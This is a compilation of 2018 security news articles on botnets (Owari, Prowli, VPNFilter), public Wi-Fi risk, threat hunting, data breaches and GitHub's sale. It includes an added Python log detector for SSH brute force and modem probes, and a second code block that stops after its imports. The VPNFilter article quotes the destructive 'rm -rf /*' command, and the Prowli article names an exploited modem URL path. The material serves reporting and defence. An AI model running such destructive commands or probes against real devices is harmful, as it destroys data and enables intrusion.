“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Investigating the database allowed the expert to discover a User table that contains login credentials for the various users who control the botnet. Some entries could be associated with botmasters, others with customers of the botnet.

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet; he was able to reach a known Owari operator who goes online as “Scarface” and who provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 customers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course not: even though the expert has taken over the MySQL database, botnet operators continuously change attack IPs to remain under the radar, even when the malicious traffic associated with some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.

Are Wi-Fi hotspots in World Cup Russia host cities secure?

7.6.2018 securityaffairs CyberCrime

Experts at Kaspersky Lab have evaluated the security of 32,000 public Wi-Fi hotspots in the 11 Russian cities hosting the World Cup.
The upcoming soccer World Cup represents a privileged target for crooks, hackers, and nation-state actors. It is essential for organizations to take care of any aspect related to the event to protect participants, including travelers using WiFi networks in the host cities.

Experts at Kaspersky Lab have evaluated the security of 32,000 public Wi-Fi hotspots in the 11 Russian cities hosting the World Cup. We have explained several times the risks associated with the use of open WiFi networks: threat actors can monitor traffic to steal sensitive data and launch MITM attacks against victims to conduct a broad range of malicious activities.

“A lack of essential traffic encryption for Wi-Fi networks where official and global activities are taking place – such as at locations around the forthcoming FIFA World Cup 2018 – offers especially fertile ground for criminals.” reads the report published by Kaspersky.

“Over a fifth (22.4%) of Wi-Fi hotspots in FIFA World Cup 2018 host cities use unreliable networks. This means that criminals simply need to be located near an access point to grab the traffic and get their hands on user data.”

The study involved volunteers who agreed to travel around the host cities searching for public Wi-Fi hotspots. The experts discovered that around 62.4 percent of hotspots are secured via WPA2 encryption, while another 13.5 percent use another, unknown encryption method.

Of course, the level of protection for the secured networks depends on the security settings, such as the strength of the password used to access the hotspot.


The study revealed that the share of secured networks varies from city to city; the researchers evaluated hotspots in 11 host cities.

Saransk was the most secure city, with 72 percent of access points using WPA/WPA2; the cities of Samara and Nizhny Novgorod follow with 67 and 66 percent respectively.

Black flag for St. Petersburg, the least secure host city, with just 50 percent of hotspots using WPA2 and 37 percent of access points completely unsecured.

It is important to highlight that even WPA2 protection should not be considered totally secure.

“Even a WPA2 connection in a cafe couldn’t be considered as secure, if the password is visible to everyone. Nevertheless, we believe that the methodology used represents the Wi-Fi hotspot security situation in the host cities, with a fair degree of accuracy.” states Kaspersky Lab.

“The results of this research show that the security of Wi-Fi connections in FIFA World Cup host cities varies. We therefore recommend that users follow some key safety rules.”

Kaspersky also provided best practices, such as using a trusted VPN while traveling; below is the complete list:

Whenever possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning that criminals won’t be able to read your data, even if they gain access to it. For example, the Kaspersky Secure Connection VPN solution can switch on automatically when a connection is not safe.
Do not trust networks that are not password-protected, or have easy-to-guess or easy-to-find passwords.
Even if a network requests a strong password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection using the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by the employees of an establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend you also disable automatic connections to existing Wi-Fi networks.
If you are not 100% sure that the wireless network you are using is secure, but you still need to connect to the Internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely do not perform any online banking operations or enter your bank card details anywhere. This will avoid situations where your sensitive data or passwords are intercepted and then used for malicious purposes later on.
To avoid becoming a cybercriminal target, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. Enabling this option is recommended when visiting any websites you think may lack the necessary protection.

How Threat Hunters Operate in Modern Security Environments
7.6.2018 securityaffairs Cyber

With millions of new malware samples surfacing on the internet every year, threat hunters need to be ever more ready and at the top of their game to ensure that their organization can remain safe and protected from all cyber threats.
Cyber security is a universe of its own. It has its own unique domains and its fair share of challenges that are faced every day by cyber security experts. Of late, a new term has surfaced on the internet: threat hunter. The role of a cyber-security threat hunter is rapidly becoming crucially important with each passing day.


In 2017, the number of cyber-attacks that took place across the US was almost 50% higher than in the previous year. And this year is no different. According to a recent survey conducted by Crowd Research Partners, “the number of threats in the cyber space have continued to double each year“.

While millions of businesses are facing threats from cyber criminals, the wise ones are busy recruiting, training, and equipping their cyber security threat hunters with sophisticated tools and equipment required to fight the online malice.

Naturally, those who are uncertain about what a cyber-security threat hunter is supposed to do are looking for avenues to acquire the skill. This article will help you get a basic understanding of most aspects of threat hunters and how they work in modern security environments.

Job Description, Skills and Qualifications of a Threat Hunter
A network threat hunter starts his research by assuming that the network has already been breached. This assumption is based on the premise that even though tools such as VPNs (recommended ones are PureVPN, PIA & Ivacy) and other server protections are in place, a breach sophisticated enough to bypass the VPN and the other security measures has already been made into the network.

A threat hunter needs to take a proactive approach while scanning all networks and servers for possible breaches or intrusions. He also needs to be very creative in understanding anomalies and slightly abnormal happenings on a network.

When it comes to technical knowledge, threat hunters need to be at the top of their game. Only when they understand in depth how a network functions and how data flows through it can they spot issues such as data being leaked or, worse, hijacked by someone else.

Lastly, a network threat hunter needs to know the SOPs prescribed by the organization he is working for, along with the SOPs of the cyber security industry. Only when he fully knows the culture that is expected to be religiously followed will he be able to recognize exceptions and detect threats that no eyes have ever seen before.

Understanding Dynamics of Modern Security Environments
The threats that modern security environments face are evolving every day. It is only logical to state that the tools and procedures in use today will soon become obsolete and be replaced with new tools and technology. Consequently, organizations that are concerned about keeping their networks and digital environments secure need to be constantly moving toward adopting new tools and techniques.

This may not guarantee ultimate safety, but it will definitely play a crucial role in keeping organizations at least on par with, if not a step ahead of, the growing threats in the online space.

How Threat Hunters Operate in Modern Security Environments
In 2016, G Data Software reported that 6.8 million new malware specimens surfaced on the internet. A year later, this number rose to 7.1 million. Looking at this trend, it is very clear that the coming years are going to be no easier on threat hunters. In fact, it emphasizes the importance of training threat hunters and preparing them for the most unexpected.

Of the 7.1 million new strains of malware discovered in 2017, obviously not all are dangerous. However, identifying the few dangerous ones is what determines whether a digital environment is secure or not. This is where threat hunters contribute to keeping networks secure.

A threat hunter identifies threats that AI systems may have missed. They do so by focusing on the shortcomings of their organization's security architecture, which fails to prevent threats from gaining entry into the digital environment.

How to Conduct a Threat Hunt
Outsource or DIY
The first step in efficiently conducting an organization-wide threat hunt is to determine whether it can be carried out by the in-house security team. In that case, it is important to allocate dedicated resources and equipment to the threat hunters.

If, for any reason, the in-house team lacks the acumen for such a task, or if the security team is occupied with other resource or time constraints, the safer option is to outsource it.

Focus on Key Areas and Make a Plan
It is crucial to treat threat hunting as a pre-planned process and not as an ad hoc task. Creating a proper plan and defining the procedures to be followed throughout the threat hunting process will play a crucial role in making the effort have a positive impact.

With a plan and a schedule in place, it can be ensured that the tasks of the threat hunting team do not interfere with those of other teams. Furthermore, the schedule also helps in pre-determining the order in which tasks are to be executed. This allows threat hunters to operate smoothly and effectively while keeping track of all the tasks that have been accomplished and the ones that still need attention.

Produce a Hypothesis
Beginning with the end in mind makes it easy to plot your journey and to know for sure when a task is completed. When hunting threats, the team should determine what it is looking for and what it wants to find. For example, the threat hunters should determine beforehand whether they are looking for malware or for intruders who may have hacked the system.

Knowing exactly what to look for makes it easy to find it if it is there, or to know when to stop the search if there are no threats. Without a hypothesis, the search for threats may become endless, and threat hunters will never be certain about when to stop.

Gather Crucial Information and Data
There is a lot to do when it comes to organizing all the available information and data. If the data is not organized, it is useless, as it becomes almost impossible to find what is needed at the right moment. The data that threat hunters collect and organize can include process names, command lines, DNS queries, destination IP addresses, digital signatures, etc.

If all this information is available but not sorted in a way that is easy to sift through, threat hunters may spend a lot of time just finding the right information, and then additional time using it in their processes. Such an approach inflates the budget and resources used in threat hunting and damages the overall productivity of the threat hunting team.

Task Automation
Without the help of AI and task automation, it would be impossible to keep up with ever-growing cyber threats. Even though a human eye is very much needed, without automation the thousands of new threats and malware samples that surface on the internet every day would go unnoticed.

Threat hunters need a combination of people who are exceptionally good at what they do and artificial intelligence built precisely for finding threats to modern security environments and sensitive networks.

That being said, there is no such thing as a perfect tool or a perfect procedure that a threat hunter can follow to eliminate threats from a modern security environment. It is a continuous struggle between online threats that keep getting better each day and the innovation required of threat hunters to stay one step ahead of cyber-attacks.

AI and the Future of Cyber Threat Hunting
One of the fastest-evolving tools in recent times is artificial intelligence and machine learning, which has been helping threat hunters reduce the time they spend on detection, prevention and fixing issues. It also helps improve the efficiency of the measures threat hunters take.
However, some people believe that as AI gets better, it will replace the need for human threat hunters. We believe that will never be the case, for two reasons.

First, AI is a developing technology that is available to both sides, the good and the evil. Moreover, some analysts even suggest that future cyber threats will be created and propagated using AI, and even blockchain, to create a much wider impact.

Second, AI is a tool created by humans. Even though it is very efficient at analyzing all options at the same time and making the best decision, it may never be able to outpace the creativity and innovation the human mind is capable of. AI may come in very handy for implementation and research purposes, but for now humans will lead the show with their own creativity and critical thinking.

Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices
7.6.2018 securityaffairs IoT

Crooks have infected over 40,000 web servers, modems, and other IoT devices with the Prowli malware as part of a cryptocurrency mining campaign and to redirect victims to malicious sites.
The Prowli malware was spotted by researchers at GuardiCore; the attackers built the huge botnet by exploiting known vulnerabilities and launching brute-force attacks.

This campaign, dubbed Operation Prowli, targeted servers and devices using the following attack methods:

Using a self-propagating worm that targets systems running SSH by brute-force credential guessing; the infected machines then download and run a cryptocurrency miner.
Exploiting the CVE-2018-7482 file download vulnerability to compromise Joomla! servers running the K2 extension.
Accessing the internet-facing configuration panel of a variety of DSL modems by using a URL such as http://:7547/UD/act?1 and passing in parameters that exploit a known vulnerability. The vulnerability affects the processing of SOAP data and allows remote code execution. It was previously used by the Mirai worm.
Using several exploits and launching brute-force attacks on the admin panel of WordPress sites.
Exploiting a 4-year-old vulnerability, CVE-2014-2623, to execute commands with system privileges on servers running HP Data Protector exposed to the internet (over port 5555).
Targeting Drupal and phpMyAdmin installations, NFS boxes, and servers with exposed SMB ports via brute-force credential guessing.

Once attackers have compromised a server or an IoT device, they determine if they can use it for cryptocurrency mining operations. Hackers used a Monero miner and the r2r2 worm, a piece of malware used to launch SSH brute-force attacks from the hacked devices.

“The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains. Cryptocurrency is a common payload of modern worms, and in this case as in many others, our attackers prefer to mine Monero, a cryptocurrency focused on privacy and anonymity to a greater degree than Bitcoin.” reads the analysis published by the experts.

“Second source of revenue is traffic monetization fraud. Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.”

The hackers also compromised servers with the WSO web shell backdoor. Hacked websites were used to host malicious code that redirects visitors to a traffic distribution system (TDS); in this scheme the crooks monetize their efforts by selling hijacked traffic.

Further details on the Prowli campaign, including IoCs, are reported in the analysis published by GuardiCore.
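Two of the behaviours listed above are noisy enough to catch in ordinary server logs: the r2r2 worm's SSH credential guessing and the probes of the DSL-modem SOAP endpoint on port 7547. The following detection logic is an added example, not GuardiCore's code; the log lines are constructed and the threshold and window are assumptions to tune per environment.

```python
"""Added example (not GuardiCore's code): detection logic for two of the noisy
behaviours in the Prowli write-up, SSH brute-force credential guessing by the
r2r2 worm and probes of the DSL-modem SOAP endpoint (/UD/act?1 on TCP/7547).
Log lines below are constructed; the thresholds are assumptions to tune."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_THRESHOLD = 5            # failures from one IP inside WINDOW -> alert
WINDOW = timedelta(minutes=2)
LOG_YEAR = 2018                 # syslog timestamps carry no year

# OpenSSH failure line as written to /var/log/auth.log
SSH_FAIL = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)
# Combined-format web server line; only the client IP and request line matter
HTTP_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')


def parse_syslog_ts(ts: str) -> datetime:
    return datetime.strptime(f"{LOG_YEAR} {ts}", "%Y %b %d %H:%M:%S")


def ssh_bruteforce_sources(lines, threshold=FAILED_THRESHOLD, window=WINDOW):
    """Return {ip: (total_failures, distinct_usernames)} for every source IP
    that produced `threshold` or more failed logins inside a sliding window."""
    events = defaultdict(list)                      # ip -> [(time, user)]
    for line in lines:
        m = SSH_FAIL.match(line)
        if m:
            events[m["ip"]].append((parse_syslog_ts(m["ts"]), m["user"]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end, (ts, _) in enumerate(evs):
            while ts - evs[start][0] > window:      # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = (len(evs), len({u for _, u in evs}))
                break
    return flagged


def tr064_probes(lines):
    """Return [(ip, request_line)] for requests to the TR-064 /UD/act path
    that the Prowli and Mirai campaigns used against DSL modems."""
    hits = []
    for line in lines:
        m = HTTP_LINE.match(line)
        if m and "/UD/act" in m["req"]:
            hits.append((m["ip"], m["req"]))
    return hits


# Constructed sample data: one guessing source, one benign failure, one key login
AUTH_LOG = [
    "Jun  7 10:00:01 web1 sshd[1201]: Failed password for root from 203.0.113.7 port 51112 ssh2",
    "Jun  7 10:00:03 web1 sshd[1202]: Failed password for invalid user admin from 203.0.113.7 port 51114 ssh2",
    "Jun  7 10:00:04 web1 sshd[1203]: Failed password for root from 203.0.113.7 port 51116 ssh2",
    "Jun  7 10:00:06 web1 sshd[1204]: Failed password for invalid user pi from 203.0.113.7 port 51118 ssh2",
    "Jun  7 10:00:07 web1 sshd[1205]: Failed password for invalid user ubnt from 203.0.113.7 port 51120 ssh2",
    "Jun  7 10:00:09 web1 sshd[1206]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2",
    "Jun  7 10:03:30 web1 sshd[1207]: Failed password for alice from 198.51.100.9 port 40210 ssh2",
    "Jun  7 10:05:00 web1 sshd[1208]: Accepted publickey for deploy from 192.0.2.10 port 40000 ssh2",
]
WEB_LOG = [
    '203.0.113.7 - - [07/Jun/2018:10:01:10 +0000] "POST /UD/act?1 HTTP/1.1" 404 162 "-" "-"',
    '192.0.2.55 - - [07/Jun/2018:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, (fails, users) in ssh_bruteforce_sources(AUTH_LOG).items():
        print(f"SSH guessing from {ip}: {fails} failures, {users} usernames tried")
    for ip, req in tr064_probes(WEB_LOG):
        print(f"TR-064 probe from {ip}: {req}")
```

The same source IP showing up in both detectors is exactly the pattern the campaign produces, since compromised hosts run the r2r2 worm and scan for further targets.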

VPNFilter malware now targets new devices, even behind a firewall
7.6.2018 securityaffairs 

The VPNFilter botnet is now targeting new devices from other vendors, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.
The VPNFilter botnet is worse than initially thought. According to a new report published by the Cisco Talos Intelligence group, the malicious code is now targeting ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE devices.

“First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.” reads a new analysis published by Talos team.

“New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected.”

The VPNFilter bot is now able to target endpoints behind the firewall and other network devices, using a new stage 3 module that injects malicious content into web traffic.

The recently discovered module, dubbed “ssler,” could be used by attackers to deliver exploits to endpoints via a man-in-the-middle capability (i.e. they can intercept network traffic and inject malicious code into it without the user’s knowledge).

“The ssler module, which we pronounce as “Esler,” provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80. This module is expected to be executed with a parameter list, which determines the module’s behavior and which websites should be targeted.” continues the analysis.

VPNFilter initially infected over 500,000 routers and NAS devices, most of them in Ukraine, but fortunately prompt action by the authorities allowed the botnet to be taken down.

A week ago, experts from the security firms GreyNoise Intelligence and JASK announced that the threat actor behind VPNFilter is now attempting to revive the botnet with a new wave of infections.

Talos researchers confirmed that more devices from Linksys, MikroTik, Netgear, and TP-Link are affected; this means the botnet could rapidly grow by infecting new consumer or SOHO devices.

Talos has already notified the vendors of the attacks, and most of them promptly started working on new firmware to address the issue.

According to experts at Juniper Networks, the VPNFilter bot doesn’t exploit a zero-day vulnerability.

“The initial list of targeted routers included MicroTik, Linksys, NetGear, and TPLink. It is now expanded to include devices from ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.” reads a post published by Juniper Networks.

“We still do not believe this list is complete as more infected devices are being discovered. There is still no sign of any zero day vulnerability being exploited, so it is likely that known vulnerabilities and weak passwords are the main vector of infection.”

The new attacks observed by Talos leverage compromised SOHO routers to inject content into web traffic using the ssler module.

The experts noticed that one of the parameters provided to the module is the source IP, a circumstance that suggests the attackers might be profiling endpoints to pick out the best targets. The module is also able to monitor the destination IP, likely to choose profitable targets, such as connections to a bank or connections in which credentials and other sensitive data are in transit.

The experts also provided further details on the device destruction module ‘dstr’ that attackers could use to render an infected device inoperable.

The dstr module is able to delete files necessary for the normal operation of the infected device; it also deletes all files and folders related to its own operation to hide its presence from forensic analysis.

“The dstr module clears flash memory by overwriting the bytes of all available /dev/mtdX devices with a 0xFF byte. Finally, the shell command rm -rf /* is executed to delete the remainder of the file system and the device is rebooted. At this point, the device will not have any of the files it needs to operate and fail to boot.” continues the analysis.

The following table, published by El Reg, shows all devices targeted by the VPNFilter bot; new ones are marked with an asterisk.

ASUS: RT-AC66U*; RT-N10 series*; RT-N56 series*
D-Link: DES-1210-08P*; DIR-300 series*; DSR-250, 500, and 1000 series*
Huawei: HG8245*
Linksys: E1200; E1500; E3000*; E3200*; E4200*; RV082*; WRVS4400N
MikroTik: CCR1009*; CCR1x series; CRS series*; RB series*; STX5*
Netgear: DG834*; DGN series*; FVS318N*; MBRN3000*; R series; WNR series*; WND series*; UTM50*
QNAP: TS251; TS439 Pro; other devices running QTS software
TP-Link: R600VPN; TL-WR series*
Ubiquiti: NSM2*; PBE M5*
UPVEL: unknown devices
Further technical details are available in the report published by Talos.

HR Software Firm PageUp Suffers Data Breach
6.6.2018 securityweek Incident

PageUp, an Australian company that provides HR software, informed customers this week that it launched an investigation on May 23 after detecting suspicious activity on its IT infrastructure.

The firm’s analysis of the incident revealed on May 28 that hackers may have gained access to names, contact information, usernames, and password hashes. Documents, such as signed employment contracts and resumes, should be safe as they are stored on different servers.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password,” said Karen Cariss, CEO and co-founder of PageUp.

While the company has only shared limited technical information regarding the incident, it did say that the attack involved a piece of malware. The breach has been investigated by both law enforcement and cybersecurity experts. Cybersecurity organizations and data regulators in Australia and the United Kingdom have been notified.

PageUp says it has 2.6 million active users across over 190 countries. Some of the company’s customers have notified job applicants and shut down their online recruitment pages following the incident.

Australia Post, which has been using PageUp since October 2016, highlighted that in the case of individuals whose applications were successful, bank details, tax file numbers and other sensitive information was also stored on PageUp servers. There is no evidence, however, that this data has been accessed by hackers, Australia Post said.

Wesfarmers-owned supermarket chain Coles has shut down its careers website and issued a statement saying it has suspended all connections between its systems and PageUp while an investigation is conducted. Other Wesfarmers retailers, including Kmart, Target and Officeworks, have also shut down their careers websites.

Australian telecoms giant Telstra has also suspended its online recruitment system due to the breach at PageUp. The company warned successful applicants that their date of birth, employment offer details, and pre-employment check outcomes were stored on PageUp systems.

The incident also impacts logistics and supply chain company Linfox and private health insurer Medibank, both of which have suspended their careers pages.

Several universities in the United States also use PageUp. However, at the time of writing, none of the U.S. universities listed on PageUp’s testimonials page have issued security alerts or suspended their online recruitment systems.

Thousands of Organizations Expose Sensitive Data via Google Groups
6.6.2018 securityweek Incident

Google has issued a warning to G Suite users after researchers discovered that thousands of organizations expose sensitive information through misconfigured Google Groups instances.

The Google Groups service allows users to create mailing lists, host internal discussions, and process support tickets. These types of communications can include highly sensitive information, which is why it’s important for companies to ensure that privacy and security settings are configured properly.

When a group is configured, its creator has to set sharing options for “Outside this domain - access to groups” to either “Private” or “Public on the Internet.” While the default option is “Private,” many organizations have set it to “Public on the Internet,” in many cases likely not realizing that anyone can access the group.

Data exposed through misconfigured Google Groups

Researchers at Kenna Security have conducted an analysis of roughly 2.5 million domains and identified more than 9,600 organizations that had allowed public access to their groups. After taking a closer look at a random sample of 171 groups, the company estimated that nearly 3,000 of the over 9,600 companies leaked some type of sensitive information.

The impacted organizations include Fortune 500 companies, universities, hospitals, media firms, financial institutions, and even government agencies.

The exposed information includes financial data, passwords, and documents containing confidential information.

“Given the sensitive nature of this information, possible implications include spear-phishing, account takeover, and a wide variety of case-specific fraud and abuse,” Kenna Security said in a blog post.

The company notified some of the organizations leaking highly sensitive data and pointed out that the “views” counter was in a vast majority of cases at zero, which indicates that no one had seen the information.

Kenna has also notified Google, but since this is not an actual vulnerability, the issue cannot be addressed with a patch. The tech giant did say, however, that it’s always reviewing its products to “help users make decisions that are appropriate for their organizations.”

Google has also published a post on its G Suite blog, providing advice on how users can configure their Google Groups settings to better protect their data.

This is not the first time researchers have warned about the risks associated with misconfigured Google Groups instances. Last year, cloud security firm RedLock warned that hundreds of organizations were likely exposing sensitive data through Google Groups. At the time, the company found names, email and home addresses, employee salary data, sales pipeline data, and customer passwords in the exposed groups.

VPNFilter Continues Targeting Routers in Ukraine
6.6.2018 securityweek

Despite their infrastructure being disrupted, the hackers behind the VPNFilter botnet continue targeting routers located in Ukraine, which is believed to be the campaign’s primary target.

When Cisco Talos brought the existence of VPNFilter to light last month, the botnet had ensnared at least 500,000 routers and network-attached storage (NAS) devices across 54 countries.

The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.

During the first stage of the infection process, once it completed initialization, the malware attempted to obtain an IP address from images hosted on the Photobucket service. If that failed, it would try to acquire the IP from an image hosted on a backup domain, toknowall.com. That IP pointed to a server hosting the stage 2 payload.

Photobucket has closed the accounts used in the attack and the FBI has managed to take control of the toknowall.com domain, thus disrupting the operation.

However, VPNFilter is designed to open a listener and wait for a specific trigger packet if the backup domain fails as well. This allows the attacker to still provide the IP for the stage 2 component.

While it’s unclear exactly what else the FBI and cybersecurity firms did to disrupt the botnet, researchers at Jask and GreyNoise Intelligence noticed that VPNFilter has continued to target routers even after Talos published its report and the toknowall.com domain was seized.

Experts have observed some IPs scanning port 2000 for vulnerable MikroTik routers located exclusively in Ukraine. The source IPs have been traced to countries such as Russia, Brazil, the United States, and Switzerland.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research,” Jask wrote in a blog post.

The VPNFilter attack was allegedly launched by Russia – specifically the group known as Sofacy, APT28, Pawn Storm, Fancy Bear, and Sednit – and the main target is believed to be Ukraine. Some links have also been found between the VPNFilter malware and BlackEnergy, which has been used by a different Russia-linked threat actor known as Sandworm. The FBI has viewed Sofacy and Sandworm as the same group when it attributed VPNFilter to Russia.

The VPNFilter malware has been observed targeting devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. All of these vendors have published advisories to warn their customers about the threat.

The FBI has advised users to reboot their routers to temporarily disrupt the malware. While rebooting a router is typically enough to remove a piece of malware, VPNFilter has a clever persistence mechanism that helps its stage 1 component survive a reboot of the device.

Microsoft to Acquire GitHub for $7.5 Billion
6.6.2018 securityweek IT

Microsoft on Monday announced that it has agreed to acquire software development and collaboration platform GitHub in a deal valued at $7.5 billion.

Under the terms of the agreement, Microsoft will acquire GitHub for $7.5 billion in Microsoft stock. The deal is expected to close by the end of 2018, subject to customary closing conditions and regulatory review.

GitHub is a cloud-based repository for source code, offering hosting, version control management and code collaboration capabilities. It is thought to have 27 million developers using its services in nearly every country in the world, and to host 80 million code repositories. Microsoft is already a major user of GitHub, reportedly with more than 1,000 employees pushing code to GitHub repositories.

GitHub was valued at $2 billion at its most recent funding round in 2015.

The acquisition makes sense for Microsoft given its increasing involvement with Linux and open source projects. There is, however, concern among many of the independent developers using the service, who point to a perceived drop in performance at both LinkedIn and Skype following their earlier acquisitions by Microsoft.

"LinkedIn has turned into a slow-loading junk after the Microsoft acquisition. I can only imagine what awaits GitHub," tweeted Catalin Cimpanu.

A further concern is that ownership could give Microsoft access to the source of potentially competitive or disruptive projects. "This is not all about Microsoft," was another tweet. "This is about the independence of what has become the de-facto home of open source. It shouldn't be owned by any company that has any agenda other than host that home."

Robert Graham of Errata Security has a different concern. GitHub has a history of national censorship attempts -- a DDoS out of Russia in 2014; blocked in India in 2014; a DDoS apparently out of China in 2015; and blocked in Turkey in 2016. On February 28, 2018, GitHub was hit by a world record DDoS peaking at 1.35 Tbps.

His concern now is that China would be able to censor GitHub via Microsoft. It cannot currently censor individual pages (such as those about the Tiananmen Square massacre in 1989) because GitHub forces the use of SSL/TLS, so the China Firewall cannot see which pages are being accessed. "The only option," he tweeted "would be to block the entire site, all access to http://GitHub.com, but China can't do that either, because so much source code is hosted on GitHub -- source code their industry needs in order to build products."

As an independent organization he believes that GitHub is too important to be blocked by the Chinese government. "When Microsoft buys GitHub, however, China will now have leverage, threatening other Microsoft interests in China in order to pressure Microsoft into censoring some GitHub pages."

In the meantime, with few details of the terms and conditions, users' reactions have been largely emotional. There was widespread concern that Microsoft's motive in buying LinkedIn was to gain access to the personal details of the world's business management. There is similar concern now that Microsoft is seeking to gain some form of control over the world's open source software.

This is unlikely. SecurityWeek spoke to Robin Wood (aka DigiNinja), an independent penetration tester who uses GitHub to host the tools he develops for his trade. Assuming the purchase is finalized, "I think the important thing to look at is the exact details of the terms and conditions and any changes they decide to make to it," he told SecurityWeek. "There may be clauses in there about ownership or use without license that currently don't mean much but could mean a lot with the change of ownership."

For the moment, he is not worried by the takeover. "There are a number of established alternatives, so they can't do much to mess up actual usage otherwise people will just move away. So probably no real change for most users of the service but some with tools that Microsoft are interested in may be hit."

For himself and his own repositories, "I won't be moving my tools unless there are any specific negative changes that affect me, but I reckon there will be a bunch of people jumping ship early just in case, and another bunch fear-mongering about all the nasty stuff that might happen, most of it just guess work."

Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub’s current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives, Microsoft said.

Google Password Protects Pixel 2 Firmware
6.6.2018 securityweek Safety

Google has made the firmware of Pixel 2 devices resistant to unauthorized upgrade attempts by password protecting it.

Specifically, anyone interested in upgrading the firmware of a Pixel 2 device needs to supply the user password to successfully complete the process and still have access to user data.

Google has required full-disk encryption for new Android devices since 2015, and the newly implemented protection is meant to complement that security feature. Google Pixel devices also encrypt all user data and keep the encryption key protected in secure hardware.

“The secure hardware runs highly secure firmware that is responsible for checking the user's password. If the password is entered incorrectly, the firmware refuses to decrypt the device. This firmware also limits the rate at which passwords can be checked, making it harder for attackers to use a brute force attack,” Google explains in a blog post.

Google is also applying digital signatures in an attempt to prevent attackers from replacing a device’s firmware with a malicious version. To replace the firmware, an attacker would have to find and exploit a vulnerability in the signature-checking process, or gain access to the signing key and sign their own firmware version to trick the device into accepting it.

While the signature-checking software is small, isolated, and vetted, which makes exploitation difficult, the signing keys, although stored in secure locations, remain accessible to a limited number of people.

“That's good, but it leaves those people open to attack by coercion or social engineering. That's risky for the employees personally, and we believe it creates too much risk for user data,” Google notes.

Google Pixel 2 devices, the Internet giant says, have insider attack resistance in the tamper-resistant hardware security module to protect the encryption keys. Thus, if an attacker does come up with a properly signed malicious firmware, they cannot install it on the security module without the user's cooperation.

Specifically, the correct password is required to upgrade the firmware. While upgrades can be forced, the company says, the process would wipe the secrets used to decrypt the user's data, effectively destroying it.

“The Android security team believes that insider attack resistance is an important element of a complete strategy for protecting user data. The Google Pixel 2 demonstrated that it's possible to protect users even against the most highly-privileged insiders. We recommend that all mobile device makers do the same,” Google notes.
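The property described above is easier to see as a state machine: a firmware image must pass the vendor signature check and the user must present the password, otherwise the update can only be forced by destroying the key that protects user data. The model below is an added example, not Google's code; its HMAC "signature" stands in for the real asymmetric signature, and the PBKDF2 password check with an attempt counter stands in for the module's rate-limited check.

```python
"""Added example (not Google's code): a model of the insider-attack-resistance
property described above. A firmware image must carry a valid vendor signature
AND the user's password must be presented; a forced update without the password
wipes the key that protects user data. The HMAC 'signature' stands in for the
real asymmetric one, and the password check is a PBKDF2 compare with an attempt
counter standing in for rate limiting; both are assumptions of this model."""
import hashlib
import hmac
import secrets
from typing import List, Optional

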